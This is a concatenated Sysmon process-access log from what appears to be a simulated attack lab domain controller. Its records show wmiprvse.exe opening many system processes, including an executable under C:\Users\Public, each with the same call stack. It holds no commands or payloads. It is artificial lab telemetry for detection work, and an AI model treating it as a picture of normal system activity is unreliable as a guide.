15:59:46.334{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-3100-00000000A301}2704C:\Windows\System32\ismserv.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027919Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:46.334{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-3000-00000000A301}3068C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027918Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:46.334{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-2E00-00000000A301}3028C:\Windows\system32\dns.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027917Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:46.334{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-2D00-00000000A301}2328C:\Program Files\Amazon\XenTools\LiteAgent.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027916Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:46.334{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-2C00-00000000A301}2896C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027915Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:46.334{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027914Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:46.334{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-2900-00000000A301}2792C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027913Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:46.334{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-2800-00000000A301}2544C:\Windows\System32\spoolsv.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027912Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:46.334{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4990-6008-2600-00000000A301}3044C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027911Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:46.334{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-498C-6008-2400-00000000A301}2932C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027910Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:46.334{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-498C-6008-2300-00000000A301}2924C:\Users\Public\splunkd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027909Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:46.334{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4988-6008-2000-00000000A301}2388C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027908Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:46.334{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1700-00000000A301}1656C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027907Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:46.334{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1600-00000000A301}1536C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027906Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:46.334{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1500-00000000A301}1492C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027905Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:46.334{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1400-00000000A301}1280C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027904Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:46.319{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1300-00000000A301}1264C:\Windows\system32\dwm.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027903Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:46.319{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1200-00000000A301}1176C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027902Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:46.319{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1100-00000000A301}1152C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027901Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:46.319{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1000-00000000A301}1160C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027900Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 